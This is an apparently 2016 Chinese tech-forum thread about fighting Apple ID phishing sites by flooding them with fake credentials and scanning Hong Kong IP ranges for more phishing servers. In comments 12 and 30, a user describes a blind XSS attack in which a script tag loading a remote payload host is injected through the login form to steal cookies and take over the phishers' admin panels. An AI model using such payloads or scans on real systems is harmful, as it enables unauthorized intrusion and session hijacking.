最近同学手机被偷了,不断收到各种骗 appleid 的短信和邮件。。做了点好事,往钓鱼网站里 post 了好多好多假数据,过几天他就关了😁
后来还是不断收到各种钓鱼网站,如法炮制,最后没几天也都关了
再后来发现 ip 基本都是香港的,于是写脚本对部分香港 ip 段扫了下,卧槽扫出 100 多个服务器。。。
于是给他们 post 点假数据:随机 9 位 qq 号 @qq.com/随机密码 不知道有没有用,不过至少按照前面的情况,能让他们都关服就可以了。。
请问各位有没有钓鱼网址提供,如果和我见到的是同类型的,我可以帮忙造点假数据进去。。 标题是 find my iphone ,模仿“找回我的 iPhone ”做的钓鱼网站
1
t333st 2016-07-21 17:40:32 +08:00 2
其实可以提交 xss
|
2
chroming 2016-07-21 17:49:02 +08:00
这个不错
|
3
leonis 2016-07-21 17:52:26 +08:00
干得好
|
4
aheadlead 2016-07-21 17:56:06 +08:00
干脆咱们建个 repo 然后维护一个 icloud 钓鱼站列表
|
5
loading 2016-07-21 18:09:10 +08:00 via Android
楼主挂了代理池没?不然一句 sql 就把你的假数据过滤了。
|
6
ji1043 2016-07-21 18:16:11 +08:00
好同志! 话说 你 Ip 怎么解决的???买的?
|
7
tracedocting 2016-07-21 18:17:55 +08:00
之前垃圾邮件里面有一堆钓鱼的,可惜随手删了……
|
8
SlipStupig 2016-07-21 18:28:37 +08:00
@aheadlead 没什么用,过两天人家就关站了
|
9
0x5e OP |
10
qfdk 2016-07-21 18:58:15 +08:00
用 xss 打它把 这个比较好玩儿 :) 拿了后台直接删东西
|
12
qfdk 2016-07-21 19:09:18 +08:00
@0x5e http://123.57.48.113/xss//index.php?do=login 注册个帐号,然后会有一个<script>xxx</script>的玩意儿, 把假的用户名或者密码换成这个玩意儿,只要那个人浏览了要是没有做过滤,你会得到他的 cookie :) 然后火狐改个 cookie 就能直接登录后台了,打 QQ 片子屡试不爽
|
13
wilddog 2016-07-21 19:10:52 +08:00
赞
|
15
ctsed 2016-07-21 19:19:46 +08:00 via iPhone
你不管他也会关的 生命周期很短 有的类型就存活几个小时
|
16
iwj 2016-07-21 19:24:48 +08:00
想学习一下代码,可以分享一下吗
|
19
sephinh 2016-07-21 19:48:58 +08:00 via Android
干得好~~~
|
23
0x5e OP |
24
0x5e OP @ctsed 可能吧,不过感觉这网站也挺挫的,要是真心想过滤的话可以搞个 ip 防火墙什么的,说不准也没记录下账号密码对应的 ip ,又或许说不准 ip 是从 X-Forwarded-For 取的。。反正闲着也是闲着我就开着刷一下吧 。。😁
|
25
DravenJohnson 2016-07-22 10:02:50 +08:00
还有这东西?
|
26
Ra8er 2016-07-22 11:18:06 +08:00
见一个 日一个
|
27
njutree 2016-07-22 13:11:09 +08:00
干的漂亮,对于这些人就该给他们大量的假数据让他们干不了坏事。
|
30
qfdk 2016-07-22 15:50:07 +08:00
最简单的方法是写个 form ,这样网站的 js 都用不了,然后 user 写上你得到的代码<script src=http://t.cn/Rt2iRuv></script> passwd 也可以,最后这个会插入 他们数据库,如果没有过滤的话,当他们打开你会得到 cookie ,其中还有 keepsession 的选项
|
31
meppy 2016-07-22 18:25:43 +08:00
都是高手,学习了
|
32
cybermay 2017-03-10 08:35:37 +08:00
你不灌数据他也会关的 骗到了账号就会关 然后再开
|